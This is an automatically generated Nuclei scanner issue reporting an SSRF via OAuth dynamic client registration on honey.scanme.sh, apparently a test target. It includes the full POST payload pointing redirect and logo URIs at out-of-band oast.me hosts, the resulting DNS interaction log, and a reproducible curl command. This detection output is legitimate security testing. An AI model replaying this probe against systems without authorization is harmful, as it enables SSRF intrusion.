mkrs2404 / tickets


SSRF due to misconfiguration in OAuth (ssrf-via-oauth-misconfig) found on honey.scanme.sh #49

Closed mkrs2404 closed 1 month ago

mkrs2404 commented 4 months ago

Details: ssrf-via-oauth-misconfig matched at honey.scanme.sh

Protocol: HTTP

Full URL: https://honey.scanme.sh/connect/register

Timestamp: Tue Apr 30 19:28:33 +0530 IST 2024

Template Information

Key Value
Name SSRF due to misconfiguration in OAuth
Authors kabirsuda
Tags misconfig, oast, oauth, ssrf, intrusive
Severity medium
Description Sends a POST request to the "/connect/register" endpoint and checks for external interaction via multiple POST parameters.

Request

POST /connect/register HTTP/1.1
Host: honey.scanme.sh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 395
Accept-Language: en-US,en;q=0.9
Content-Type: application/json
Accept-Encoding: gzip

{
  "application_type": "web",
  "redirect_uris": ["https://coofgv4mjeun8ktjo61gsi6kf91hazzx5.oast.me/callback"],
  "client_name": "honey.scanme.sh",
  "logo_uri": "https://coofgv4mjeun8ktjo61gm9jx4gw77ei16.oast.me/favicon.ico",
  "subject_type": "pairwise",
  "token_endpoint_auth_method": "client_secret_basic",
  "request_uris": ["https://coofgv4mjeun8ktjo61gomq58k53hsmbe.oast.me"]
}

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 679
Content-Type: application/json
Date: Tue, 30 Apr 2024 13:58:32 GMT

POST /connect/register HTTP/1.1
Host: honey.scanme.sh
Accept-Encoding: gzip
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Length: 395
Content-Type: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0

{
  "application_type": "web",
  "redirect_uris": ["https://coofgv4mjeun8ktjo61gsi6kf91hazzx5.oast.me/callback"],
  "client_name": "honey.scanme.sh",
  "logo_uri": "https://coofgv4mjeun8ktjo61gm9jx4gw77ei16.oast.me/favicon.ico",
  "subject_type": "pairwise",
  "token_endpoint_auth_method": "client_secret_basic",
  "request_uris": ["https://coofgv4mjeun8ktjo61gomq58k53hsmbe.oast.me"]
}

Interaction Data

dns (AAAA) Interaction from 172.253.221.132 at coofgv4mjeun8ktjo61gsi6kf91hazzx5

Interaction Request

;; opcode: QUERY, status: NOERROR, id: 61711
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME. IN   AAAA

Interaction Response

;; opcode: QUERY, status: NOERROR, id: 61711
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME. IN   AAAA

;; ANSWER SECTION:
CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME.  3600    IN  A   178.128.209.14

;; AUTHORITY SECTION:
CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME.  3600    IN  NS  ns1.oast.me.
CoOFGv4mjEUn8kTjO61gsI6kf91HazZX5.OaSt.ME.  3600    IN  NS  ns2.oast.me.

;; ADDITIONAL SECTION:
ns1.oast.me.    3600    IN  A   178.128.209.14
ns2.oast.me.    3600    IN  A   178.128.209.14

References:

CURL command

curl -X 'POST' -d '{
  "application_type": "web",
  "redirect_uris": ["https://coofgv4mjeun8ktjo61gsi6kf91hazzx5.oast.me/callback"],
  "client_name": "honey.scanme.sh",
  "logo_uri": "https://coofgv4mjeun8ktjo61gm9jx4gw77ei16.oast.me/favicon.ico",
  "subject_type": "pairwise",
  "token_endpoint_auth_method": "client_secret_basic",
  "request_uris": ["https://coofgv4mjeun8ktjo61gomq58k53hsmbe.oast.me"]
}' -H 'Accept-Language: en-US,en;q=0.9' -H 'Content-Type: application/json' -H 'Host: honey.scanme.sh' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0' 'https://honey.scanme.sh/connect/register'

Generated by Nuclei v3.2.5